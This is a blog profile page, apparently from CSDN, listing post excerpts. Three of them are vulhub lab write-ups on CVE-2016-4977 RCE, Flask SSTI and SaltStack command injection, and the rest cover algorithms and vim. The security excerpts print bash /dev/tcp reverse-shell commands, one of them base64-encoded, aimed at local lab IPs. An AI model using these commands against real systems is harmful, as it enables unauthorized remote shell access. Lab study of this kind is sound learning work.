自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(12)
  • 收藏
  • 关注

原创 CVE-2016-4977(RCE漏洞)

其中YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjE0MS82OSAwPiYx是进行了base64编码,解码后就是经典反弹shell命令:bash -i >& /dev/tcp/192.168.11.141/4444 0>&1。2.用棱角社区制作反弹shell,ip和端口都是kali的:192.168.11.141:69。显示了4*4的结果,说明可以执行我们自己的代码,那我们想获取对方shell。将其拼接到url里,注意url里面不要有换行符。然后,执行poc.py。

2025-02-19 12:13:03 378

原创 flask/ssti(服务器端模板注入(SSTI) 漏洞)

1.进入vulhub/flask/ssti后,docker-compose up -d拉取环境(docker-compose down关闭环境)2.ifconfig查看靶机ip:192.168.11.135,docker ps查看端口:8000,访问http://192.168.11.135:8000eval是 Python 中的一个内置函数,它可以动态执行字符串形式的 Python 代码。我们目标通过利用 SSTI 漏洞找到并调用eval,从而在服务器上执行任意代码,进一步控制服务器。

2025-02-15 01:07:22 336

原创 SaltStack 命令注入漏洞

替换为攻击者ip和端口:bash -i >& /dev/tcp/192.168.11.135/69 0>&1。2.bash -i >& /dev/tcp/<攻击者IP>/<端口> 0>&1。1.8000是saltstack的api端口,要通过https访问。2.在浏览器输入https://myip:8000/run。3.把数据请求方式改为post,就可提交数据。下一步考虑怎么让靶机执行 反弹shell指令。总结:命令型漏洞用反弹shell的方法。靶机成功把shell反弹给了攻击者。

2025-02-13 16:59:23 147

原创 vim使用

阅读模式下,yy复制当前行,p粘贴,i是插入到前面位置,a是插入到后面位置(append追加)直接打开是阅读模式,输入i进入编辑模式,esc退出编辑模式进入阅读模式。

2025-02-12 13:25:05 97

原创 双指针题目集合

双指针题目集合

2022-10-08 11:43:11 277

原创 递归经典习题

递归经典问题

2022-10-07 10:25:55 206

原创 排序题目精选

排序题目集合

2022-10-05 20:34:13 164

原创 Codeforces Round #277.5 (Div. 2)

Codeforces Round #277.5 (Div. 2)

2022-10-04 20:44:23 234

原创 位运算总结

位运算常用操作总结

2022-10-01 19:32:33 206

原创 序列化自动机

序列化自动机

2022-09-30 20:49:04 152

原创 二维前缀和

二维前缀和模板+例题

2022-09-29 10:43:50 150

原创 NOIP2005校门外的树c++ (合并区间/差分前缀和)

因为可能有部分区间重合,可以对重合的区间进行合并。做法是对区间数组的一维进行排序。排序之后,可以合并的区间一定是连续的(直观感受一下就行,证明就不写了)。实现细节上,vector的push_back()方法是在原数组的基础上开辟新内存,这个bug找了一个多小时。如果定义vector时不分配长度,用push_back没问题;如果本身分配了长度,再用push_back就会产生一些小问题。

2022-09-23 10:31:10 604

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除